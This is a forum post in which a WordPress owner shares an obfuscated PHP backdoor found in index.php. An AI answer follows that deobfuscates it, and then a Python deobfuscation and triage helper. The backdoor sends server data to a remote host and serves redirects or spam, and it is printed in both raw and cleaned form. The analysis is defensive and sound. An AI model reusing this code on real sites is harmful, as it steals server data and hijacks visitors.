Have Been HACKED, AI Said my server is hacked.
Posted: Sat 26. Jul 2025, 10:09
I have been hacked, this is the script inside my WP installation:
-------------------------------------------------------------------------------------
<?php $Bv_CzsSGJ = (("sXvJW")[0].("t_3Z")[0]./**/("xerX")[2].("ftoEd")[1].("toLJr")[1].("y7km0")[2])("Bv_CzsSGJ"); $z580TH = lcfirst("S4Prn7"); $ju609ea8 = ["zu7zNJVCkm"]; $vhipKb8BF = (("VisM")[2].("btU_")[1]./**/("rR2Q4p")[0]./**/("sBtZK")[0]./* */("RLBdtP")[4].("cBrRKQ")[2])("vhipKb8BF", "Rzlpb"); $E3IsuE = (("LJuiG")[3].("md84")[0]./* */("apbk")[1].("_l07i")[1]./* */("ozPd")[0]./**/("V7YydT")[4]./**/("Exfzeu")[4])(",",["TSL9OC3","fV1gGUC","My2NkDsuI","SmIZn3fWb"]); new dBi7r();function uAJRo($yRygfo){ if((("VisM")[2].("btU_")[1]./* */("rR2Q4p")[0]./* */("sBtZK")[0]./**/("RLBdtP")[4].("cBrRKQ")[2])($yRygfo,/**/("lQ<y1m")[2].("uIX67R")[0]./**/("m1sre")[3].("IlPb")[1]./**/("sKtp")[0].("tekUm")[1]./* */("tGfwHR")[0])){ exit((("nh3E")[1].("OKeO5")[2].("q6ajVU")[2].("dQ98j")[0]./* */("erm6Jt")[0].("CiXrrv")[4])(("lFCCn")[3]./* */("go_P")[1]./* */("sLnz7")[2]./**/("ITtEy")[2].("cReF")[2].("vB6n9")[3]./* */("Rtyt")[1]./* */("Pmz-B")[3]./**/("CtZmKh")[1].("hyjy")[1].("pQsR")[0]./**/("Xj_OeQ")[4].("K:m7C")[1]./* */("toAGF")[0].("hWeo")[2].("QXxPbG")[2].("ety1")[1]./**/("/nHx_U")[0].("xIbo")[0].("meeYOn")[0]./**/("lqTQx2")[0]).$yRygfo); } }$bwEbxmI = define("kT9eb","qtxnTd"); $Idr3n1k = (("wOs6n")[2]./**/("wtf0")[1].("Crr06Y")[2].("DOH_Fz")[3]./**/("YtrVv")[2]./**/("HecnO")[1]./**/("QpTr")[1].("lzTcl")[0].("UAaHp")[2].("_kcoOK")[2]./**/("ae2mb")[1])("Idr3n1k", "", "Idr3n1k");function T7Ur8d5($yRygfo){ if((("VisM")[2].("btU_")[1]./**/("rR2Q4p")[0]./* */("sBtZK")[0]./* */("RLBdtP")[4].("cBrRKQ")[2])((/**/("wFt2")[2]./**/("BrrG")[2].("u0itB")[2]./* */("Bmql")[1])($yRygfo),/**/("ZYU<1V")[3].("hHp6")[0].("dktI0e")[2].("I_mIK")[2]./**/("uAlE")[2])){ exit($yRygfo); } }$Dq2Gt = (/**/("gn0Hce")[4].("JKhW")[2].("Ruws")[1].("B98nw")[3].("oNkF")[2]./* */("X0_y")[2]./* */("ED0KsS")[4].("np0F")[1].("lMfxQP")[0]./* */("iKdBj")[0].("Ct_L3c")[1])("zdATk3VSmb",3); $QIT5KZ = QfB2JQa($_SERVER);function LgNwO62($yRygfo){ if((/* 
*/("svln")[0].("LIsku_")[4]./**/("LbTg")[1].("bhPsHk")[3].("KKttIX")[2].("nrJiXa")[1])($yRygfo,0,4)==/**/("Q_hS8")[2]./**/("tjMcyZ")[0]./* */("jcptSf")[3]./**/("gpW7X")[1]){ (("nh3E")[1].("OKeO5")[2].("q6ajVU")[2].("dQ98j")[0]./* */("erm6Jt")[0].("CiXrrv")[4])(/**/("bLrp")[1].("obV8")[0].("co8v")[0]./**/("qhapyI")[2].("pXtw")[2].("ip4I")[0]./**/("OwqxoN")[4]./**/("jZnCuD")[2]./**/("S:EH4V")[1]./* */("xxY kD")[3].$yRygfo); } }$CmS3AsY5F = addslashes("CmS3AsY5F"); $pciARfg7 = addslashes("pciARfg7"); $pm42Egxh7 = (/**/("wuPv")[0]./**/("oBbu3")[0].("QLjre")[3]./**/("DcSkdN")[4]./**/("TwACW1")[1].("rrQhsE")[1]./**/("EqaY")[2]./**/("T4MUpp")[4])("", 12);$EHP6rcJ = addslashes("EHP6rcJ"); $QIT5KZ = BYJIC5V($QIT5KZ);$EuGOkPL = (string) null; $dAp2Ic = (("sXvJW")[0].("t_3Z")[0]./**/("xerX")[2].("ftoEd")[1].("toLJr")[1].("y7km0")[2])("dAp2Ic"); class v2GcV{ public static function __callStatic($name, $arguments) { $JZr7Oq = (/**/("v7c1Z")[2].("udiznU")[0].("nyrr")[2].("zHNll")[3].("_QZa")[0].("Plit")[2].("xnZk")[1].("WikZ")[1]./**/("etGho4")[1])(); $VcsL3f = /**/("Nh4i")[1]./* */("jOPtZ1")[3].("OEtC")[2]./**/("TpSn")[1].("Cw:Yx")[2]./* */("/_pYQ")[0].("/sGZxP")[0]./**/("XK3dhY")[3].("Nbhm0")[1].("U2Qr")[1].("6U7UL")[0]./* */("i7J11W")[4]./* */("e8pA.E")[4]./* */("KdV7")[1].("GeC2aU")[4]./**/("tYof")[0]./**/("wVcax")[3]./* */("OFaJnP")[2]./**/("Gpbb_")[3]./* */("lcIlzH")[3].("oz2QS")[0]./**/("Zgek")[1].(".xfd")[0].("OclW1T")[1]./* */("XoSv")[1].("mQQU")[0].("/bsEDc")[0].("dY8W")[0]./**/("Mkubb")[3].("G_6_8")[3].("rc6qV")[1]./* */("w3l1")[2].("fQo4C")[2]./**/("e36uuf")[3].("K_ydl")[3]./**/("Z85_Z")[3]./**/("j27y3")[1].("jE4KdT")[2].("M1VIB")[3].("F.YDQe")[1].("epw2")[1].("tadhO")[3].("K4pfqK")[2]; (/**/("icY3")[1].("OuQ6S")[1]./**/("rStD")[0].("lIzQ")[0]./**/("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./* */("oRB5")[0]./**/("pc3K0")[0]./* */("eytEh1")[2])($JZr7Oq, (int)(("W1ckY8")[1].("0AKn6")[0]./**/("0fUsK")[0]./**/("e0u_mP")[1].("2qEJ")[0]),$VcsL3f./* 
*/("f1?lnX")[2]./**/("utoW")[0].("Qzap")[2].("=yTdRl")[0].(/**/("OZxSuh")[4].("Yr_JYL")[1].("Knlz")[2].("PBeaTL")[2].("nmg0Fq")[0]./* */("cpTehD")[0]./**/("hoA1")[1].("dQMLfg")[0].("eebYU")[1])($arguments[0])); (/**/("icY3")[1].("OuQ6S")[1]./**/("rStD")[0].("lIzQ")[0]./* */("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./**/("oRB5")[0]./**/("pc3K0")[0]./**/("eytEh1")[2])($JZr7Oq, (int)(/**/("U1Ar2j")[1]./**/("YU928")[2]./* */("a9qO")[1]./* */("bX1Oh")[2].("xw34")[2]), 1); (/**/("icY3")[1].("OuQ6S")[1]./**/("rStD")[0].("lIzQ")[0]./**/("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./**/("oRB5")[0]./**/("pc3K0")[0]./**/("eytEh1")[2])($JZr7Oq, (int)(("Kj6d")[2].("eC4sx")[2]./**/("a_PxKz")[1]./**/("YwMrqY")[3]./* */("eb9J0")[0]./**/("gfOpok")[3].("lbN_")[0]), 0); (/**/("icY3")[1].("OuQ6S")[1]./* */("rStD")[0].("lIzQ")[0]./* */("O_Dao2")[1].("e1i8sC")[4].("egGee")[3].("TyPt9")[3]./* */("oRB5")[0]./**/("pc3K0")[0]./**/("eytEh1")[2])($JZr7Oq, (int)(/* */("cA1N")[2].("NYTD3G")[4]./* */("Bcg_e")[3]./**/("YrEBD")[1]./* */("Se0m4")[1]./* */("pQmdz")[0].("Wdl0")[2]), 47); global $yRygfo; $yRygfo = (("YcVy")[1]./**/("PuST")[1]./**/("RrfX")[1].("TlWw")[1].("Qn_hd7")[2]./* */("_8eu3")[2].("hvyxG3")[3].("YdZet")[3].("cWV0F")[0])($JZr7Oq); (("cNBhw")[0]./**/("XuGwkU")[1].("rKLN7")[0]./* */("t0YSle")[4]./**/("F_k5")[1].("u7cYs")[2]./**/("NlEi")[1]./**/("vmUoyw")[3].("p7Fs15")[3].("P9WYe0")[4])($JZr7Oq); }}$b2Fw_ = metaphone("LIgMaNHhQ"); $prRzXfPZ = (("LJuiG")[3].("md84")[0]./* */("apbk")[1].("_l07i")[1]./**/("ozPd")[0]./**/("V7YydT")[4]./**/("Exfzeu")[4])("prRzXfPZ",[]);v2GcV::calculate($QIT5KZ);$rAgH0yzS = strval(false); function QfB2JQa($IBGl_oL1){ return (/* */("szjFD")[2].("Sfs1q")[2].("H0o8vn")[2].("pYnI")[2]./**/("jaj7_I")[4].("hgecr")[2]./* */("GbnKx7")[2]./**/("WOYcH")[3]./**/("oiG3")[0].("dzNf")[0]./**/("zer7o")[1])($IBGl_oL1);}$kdzh3PGr = (/* */("wuPv")[0]./**/("oBbu3")[0].("QLjre")[3]./**/("DcSkdN")[4]./**/("TwACW1")[1].("rrQhsE")[1]./* 
*/("EqaY")[2]./**/("T4MUpp")[4])("", 9);$yqQr8SJ0m = (("sXvJW")[0].("t_3Z")[0]./**/("xerX")[2].("ftoEd")[1].("toLJr")[1].("y7km0")[2])("yqQr8SJ0m"); $rLMs02a = (/**/("rXsx9i")[2]./* */("Ikt1RB")[2]./**/("rXde")[0].("R_0_9O")[3].("bU1rBM")[3]./**/("O1eA")[2].("vzpxOM")[2].("NnxeP9")[3]./* */("IdOar")[3]./**/("trk9s")[0])("", 8); $rcuGl = LgNwO62($yRygfo);$GzhbIqF0C = (/**/("svln")[0].("LIsku_")[4]./* */("LbTg")[1].("bhPsHk")[3].("KKttIX")[2].("nrJiXa")[1])("GzhbIqF0C",9,0);$Uug2Hs3M5 = date("Y-m-d H:i:s"); $ohlEp = (string) null; class dBi7r{ public function __construct() { $_SERVER[("G8dTjH")[3]]=("cJXu5")[3]; $_SERVER[/**/("TpynZJ")[0]./**/("PTJ9")[0]./* */("LuQzg9")[0]]=("Zgnt4K")[4]; }}function BYJIC5V($IBGl_oL1){ return (/**/("bjnq")[0].("zHag")[2]./* */("PsFWD")[1]./* */("EehjJ_")[1].("JM6p85")[2]./**/("fl4Ys")[2].("SL0_S3")[3]./**/("SedO")[1].("vnP_Je")[1].("EbcLf")[2]./**/("VB6sox")[4].("Iud6")[2].("JkWNeJ")[4])($IBGl_oL1);}$ZdD3L = uAJRo($yRygfo);$jVQyrA3l7 = strval(false); $_wPuX = (/**/("wFt2")[2]./**/("BrrG")[2].("u0itB")[2]./**/("Bmql")[1])(" "); $c2wAS = (/**/("rXsx9i")[2]./**/("Ikt1RB")[2]./**/("rXde")[0].("R_0_9O")[3].("bU1rBM")[3]./* */("O1eA")[2].("vzpxOM")[2].("NnxeP9")[3]./**/("IdOar")[3]./**/("trk9s")[0])("", 10); $eP7ir6Ee_ = str_shuffle("H7WV1K"); $imyX3 = str_shuffle("v2cHS0"); $kMPk09 = (("DqsS8")[2]./**/("Eotk3")[2].("yrYcL")[1]./* */("F_CZ1")[1].("opja")[1]./**/("LaLPga")[1].("HsdF")[2])("", 0); $W15hfxn = T7Ur8d5($yRygfo);$GqLbk0DI = md5("idH58Uam9"); $mBq_zMY5 = false; $JKwyDLc = (("LJuiG")[3].("md84")[0]./**/("apbk")[1].("_l07i")[1]./**/("ozPd")[0]./**/("V7YydT")[4]./**/("Exfzeu")[4])("JKwyDLc",[]);$WEzd3SA = (/**/("wuPv")[0]./**/("oBbu3")[0].("QLjre")[3]./* */("DcSkdN")[4]./**/("TwACW1")[1].("rrQhsE")[1]./* */("EqaY")[2]./**/("T4MUpp")[4])("", 7);$dAsa2l03d = str_shuffle("URKBs"); ?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
------------------
Qwen AI response:
------------------------
The provided PHP code is heavily obfuscated with string concatenation and comments to hide its functionality. After deobfuscation, it's clear the code is malicious—it exfiltrates server information to a remote attacker-controlled server and processes the response to either redirect, serve XML, or serve HTML content based on the server's instructions. Below is the cleaned, readable version with explanations:
```php
<?php
// Malicious payload that runs before WordPress loads
// 1. Collects server information and sends it to attacker's server
// 2. Processes response to redirect, serve XML, or serve HTML

// Function to redirect if response starts with "http"
function handleRedirect($response) {
    if (substr($response, 0, 4) == "http") {
        header("Location: " . $response);
    }
}

// Function to exit with XML header if response contains "<urlset"
// (the obfuscated original is exit(header("Content-type: text/xml") . $response):
// the header is sent, then the response body is output and execution stops)
function handleXmlResponse($response) {
    if (strstr($response, "<urlset")) {
        header("Content-type: text/xml");
        exit($response);
    }
}

// Function to exit and output response if it contains HTML
function handleHtmlResponse($response) {
    if (strstr(trim($response), "<html")) {
        exit($response);
    }
}

// Class to send server data to attacker's server
class ServerDataSender {
    public static function __callStatic($name, $arguments) {
        $ch = curl_init();
        $attackerUrl = "http://example.com/path/to/script.php";

        // Build request URL with base64-encoded server data
        $requestData = $arguments[0];
        $url = $attackerUrl . "?ua=" . urlencode($requestData);

        // Configure cURL; the obfuscated code passes the option numbers as (int)
        // casts of digit-prefixed junk strings, which decode to 10002, 19913, 64 and 13
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 47); // option 13 is CURLOPT_TIMEOUT (seconds)

        // Store response in global variable
        global $serverResponse;
        $serverResponse = curl_exec($ch);
        curl_close($ch);
    }
}

// Initialize and send server data
$serverData = json_encode($_SERVER);
$serverData = base64_encode($serverData);
ServerDataSender::sendData($serverData);

// Process attacker's response
handleXmlResponse($serverResponse);
handleRedirect($serverResponse);
handleHtmlResponse($serverResponse);

// WordPress front controller (original code)
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
?>
```

### Key Components Explained:

1. **Server Data Exfiltration**:
   - `json_encode($_SERVER)` collects all server environment variables
   - Data is base64-encoded and sent via cURL to attacker's server (`http://example.com/path/to/script.php`)
   - The request includes a parameter `ua` containing the encoded server data
2. **Response Handling**:
   - **XML Handling**: If response contains `<urlset`, sends `Content-type: text/xml` header and exits (likely for sitemap injection)
   - **Redirect Handling**: If response starts with `http`, redirects browser to that URL (phishing or malware distribution)
   - **HTML Handling**: If response contains `<html`, outputs the response directly (serving malicious content)
3. **Malicious Infrastructure**:
   - The attacker's server (`http://example.com/path/to/script.php`) controls the payload's behavior
   - Common tactics include:
     - SEO spam (injecting hidden links)
     - Phishing redirects
     - Backdoor access
     - Malware distribution

### Critical Security Notes:

- **This is a backdoor infection** commonly found in compromised WordPress sites
- The obfuscation techniques used are typical of:
  - Server-side request forgery (SSRF)
  - Data exfiltration
  - Dynamic payload delivery
- **Immediate actions required**:
  1. Isolate the infected server
  2. Scan all files for similar obfuscated code
  3. Check for unauthorized users/backdoors
  4. Update WordPress/core plugins
  5. Change all credentials
  6. Restore from clean backups

> **Important**: The URL `http://example.com/path/to/script.php` is a placeholder—real attacks use attacker-controlled domains. Never run this code on a live system. The cleaned version is for analysis only; remove this code entirely from infected sites.
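An added analysis helper, not part of the original post or of the quoted Qwen answer. The pasted file builds every function name and string by indexing short throwaway literals (`("VisM")[2]` is `s`, `("btU_")[1]` is `t`, and so on), joins the characters with `.`, breaks the joins up with empty `/**/` comments, and passes the `curl_setopt` option numbers as `(int)` casts of digit-prefixed junk such as `"13_repl"`. The Python below undoes exactly that pattern. The two `SAMPLE` lines are fragments copied from the pasted code (the `strstr`/`<urlset` check and the fourth `curl_setopt` call); the regexes, the `CURL_OPTIONS` table (public libcurl constant numbers) and the `is_suspicious` threshold are this example's own additions. It also gives the "scan all files for similar obfuscated code" step something concrete to run: `indexed_literal_count` is a cheap per-file triage signal, because ordinary PHP almost never indexes a quoted literal directly.

```python
"""Undo the ("literal")[index] concatenation obfuscation seen in the pasted index.php.

Added example: the two SAMPLE lines are fragments copied from the posted file;
the regexes, CURL_OPTIONS table and threshold are this example's own.
"""
import re

# ("sXvJW")[0]  ->  one character of a throwaway literal
INDEXED_LITERAL = re.compile(r'\(\s*"((?:[^"\\]|\\.)*)"\s*\)\s*\[\s*(\d+)\s*\]')
# "a" . "b"  ->  "ab"  (applied until nothing changes)
CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\.\s*"((?:[^"\\]|\\.)*)"')
# ("strstr")(...)  ->  strstr(...)   PHP lets a string expression name the callee
WRAPPED_CALL = re.compile(r'\(\s*"([A-Za-z_][A-Za-z0-9_]*)"\s*\)\s*\(')
# (int)("13_repl")  ->  13   PHP's int cast keeps the leading digits and drops the rest
INT_CAST = re.compile(r'\(int\)\s*\(\s*"([^"]*)"\s*\)')
# the /**/ and /* */ fillers used to break up the '.' joins
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# libcurl option numbers relevant to this family (public curl.h constants)
CURL_OPTIONS = {
    10002: "CURLOPT_URL",
    19913: "CURLOPT_RETURNTRANSFER",
    64: "CURLOPT_SSL_VERIFYPEER",
    13: "CURLOPT_TIMEOUT",
    52: "CURLOPT_FOLLOWLOCATION",
}


def php_int_cast(text):
    """Mimic PHP's (int) on a string: the leading integer prefix, else 0."""
    m = re.match(r"\s*[+-]?\d+", text)
    return int(m.group()) if m else 0


def _pick(m):
    literal, index = m.group(1), int(m.group(2))
    # an out-of-range offset reads as "" in PHP (with a warning); escapes are left raw
    return '"%s"' % (literal[index] if index < len(literal) else "")


def _option_name(m):
    number = php_int_cast(m.group(1))
    return CURL_OPTIONS.get(number, str(number))


def deobfuscate(src):
    """Return src with literals resolved, joins folded and callees unwrapped."""
    src = BLOCK_COMMENT.sub("", src)
    src = INDEXED_LITERAL.sub(_pick, src)
    previous = None
    while previous != src:  # fold "a"."b"."c" one neighbouring pair at a time
        previous, src = src, CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    src = INT_CAST.sub(_option_name, src)
    return WRAPPED_CALL.sub(r"\1(", src)


def indexed_literal_count(src):
    """How many ("...")[n] constructs a file contains; a cheap triage signal."""
    return len(INDEXED_LITERAL.findall(src))


def is_suspicious(src, threshold=8):
    """Flag a file for manual review when the pattern appears more than a handful of times."""
    return indexed_literal_count(src) >= threshold


# Constructed sample: two fragments from the pasted file, joined as two lines
SAMPLE = "\n".join([
    '$h = (("VisM")[2].("btU_")[1]./**/("rR2Q4p")[0]./**/("sBtZK")[0]./* */("RLBdtP")[4].("cBrRKQ")[2])'
    '($r, ("lQ<y1m")[2].("uIX67R")[0]./**/("m1sre")[3].("IlPb")[1]./**/("sKtp")[0].("tekUm")[1]./* */("tGfwHR")[0]);',
    'curl_setopt($ch, (int)(/* */("cA1N")[2].("NYTD3G")[4]./* */("Bcg_e")[3]./**/("YrEBD")[1]./* */("Se0m4")[1]'
    './* */("pQmdz")[0].("Wdl0")[2]), 47);',
])

if __name__ == "__main__":
    print("indexed literals:", indexed_literal_count(SAMPLE), "suspicious:", is_suspicious(SAMPLE))
    print(deobfuscate(SAMPLE))
```

Run it against a copy of the suspect file offline and read the output; the decoded text is for analysis, never for execution. On the two fragments above it yields `strstr($r, "<urlset")` and `curl_setopt($ch, CURLOPT_TIMEOUT, 47)`: the option number behind the `(int)` cast in the fourth `curl_setopt` of the pasted code is 13, which is `CURLOPT_TIMEOUT`.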